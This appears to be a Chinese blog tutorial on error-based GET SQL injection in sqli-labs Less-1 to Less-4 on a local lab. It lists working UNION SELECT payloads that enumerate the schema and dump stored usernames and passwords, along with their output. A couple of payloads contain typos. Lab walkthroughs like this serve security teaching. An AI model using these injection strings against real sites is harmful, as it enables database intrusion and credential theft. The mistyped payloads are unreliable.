0%

GET基于报错的sql注入

5f69af32b943b.jpg

sql注入分类

数字型和字符型

GET基于报错的sql注入

通过再URL中修改对应的ID值,为正常数字,大数字,字符(单引号,双引号,括号),反斜杠\来探测URL中是否存在注入点

这里我以sqli-labs中的题为例:

less1

这里我再URL中输入?id=1来进行id传参,?不想我们以前写的index.php?id=1是因为如果不写前面的就表示默认页面或者index.php。

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

我们再输入?id=1'返回sql错误

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

返回''1'' LIMIT 0,1',去掉最外面俩个单引号'1'' LIMIT 0,1'

我们猜测其真正的SQL语句:

1
select login_name,password from admin where id='id' LIMIT 0,1

less2

我们输入?id=1

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

我们再输入?id=1'返回sql错误

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

返回'' LIMIT 0,1',去掉单引号' LIMIT 0,1

猜测SQL语句:

1
select login_name,password from admin where id=id LIMIT 0,1

less3

我们输入?id=1

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

我们再输入?id=1'返回sql错误

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

返回''1'') LIMIT 0,1',去掉单引号'1'') LIMIT 0,1

猜测SQL语句:

1
select login_name,password from admin where id=('id') LIMIT 0,1

我们输入?id=1’) –+后发现可以绕过,证明我们猜测是正确的。

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

less4

我们输入?id=1

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

我们再输入?id=1'?id=1)都没有错误,当我们输入?id=1”发现SQL错误

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

返回'"1"") LIMIT 0,1',去掉单引号"1"") LIMIT 0,1

猜测SQL语句:

1
select login_name,password from admin where id=("id") LIMIT 0,1

我们输入?id=1”) –+后发现可以绕过,证明我们猜测是正确的。

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

GET基于报错的SQL注入利用

方法:

1.利用order by 判断字段数

2.利用 union select 联合查询,获取表名。

1
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3.利用union select 联合查询,获取字段名.

1
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=users() --+

4.利用union select 联合查询,获取字段值。

1
0' union select 1,group_concat(username,0x3a,password),3 from users --+

less1

http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,2,3 --+这里发现2和3可以注入。

1
2
3
Welcome    Dhakkan
Your Login name:2
Your Password:3

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,user(),database() --+

1
2
3
Welcome    Dhakkan
Your Login name:root@localhost
Your Password:security

换成user()database()后发现登录用户是root@localhost,数据库是security

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,version(),database() --+

1
2
3
Welcome    Dhakkan
Your Login name:5.5.47 version 5.5.47
Your Password:security

我们可以看到数据库版本是5.5.47,默认定义了information_schema数据库。

获取表名:

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

group_concat(table_name)可以看到表名

1
2
3
Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

获取字段名:

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

1
2
3
Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

获取字段值:

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+

1
2
3
Welcome    Dhakkan
Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3

less2(整数注入)

order by 猜测字段数

http://127.0.0.1/sqli/Less-2/?id=1%20order%20by%203%20--+

发现order by 3 正确 order by 4 不正确

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

查找注入点

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,2,3 --+

1
2
3
Welcome    Dhakkan
Your Login name:2
Your Password:3

查询数据库版本

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,version(),3 --+

数据库版本:5.5.47

1
2
3
Welcome    Dhakkan
Your Login name:5.5.47
Your Password:3

获取表名

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,group_concat(table_name,3 from information_schema.tables where table_schema=database() --+

1
2
3
Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

获取字段名

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

1
2
3
Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

获取字段值

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,group_concat(username,0x3a,password),3 from users --+

1
2
3
Welcome    Dhakkan
Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3

less3

http://127.0.0.1/sqli/Less-3/?id=1') order by 3 --+

发现order by 3 正确 order by 4 不正确

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

查找注入点:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,2,3 --+

1
2
3
Welcome    Dhakkan
Your Login name:2
Your Password:3

获取数据库版本:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,version(),3 --+

1
2
3
Welcome    Dhakkan
Your Login name:5.5.47
Your Password:3

获取表名:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

1
2
3
Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

获取字段名:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

1
2
3
Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

获取字段值:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,group_concat(username,0x3a,password),3 from users --+

1
2
3
Welcome    Dhakkan
Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3

less4

http://127.0.0.1/sqli/Less-4/?id=1") order by 3 --+

发现order by 3 正确 order by 4 不正确

1
2
3
Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

获取查找注入点:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,2,3 --+

1
2
3
Welcome    Dhakkan
Your Login name:2
Your Password:3

获取数据库版本:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,version(),3 --+

1
2
3
Welcome    Dhakkan
Your Login name:5.5.47
Your Password:3

获取表名:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() --+

1
2
3
Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

获取字段名:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name ='users' --+

1
2
3
Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

获取字段值:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,group_concat(username,0x3a,password),3 from users --+

1
2
3
Welcome    Dhakkan
Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3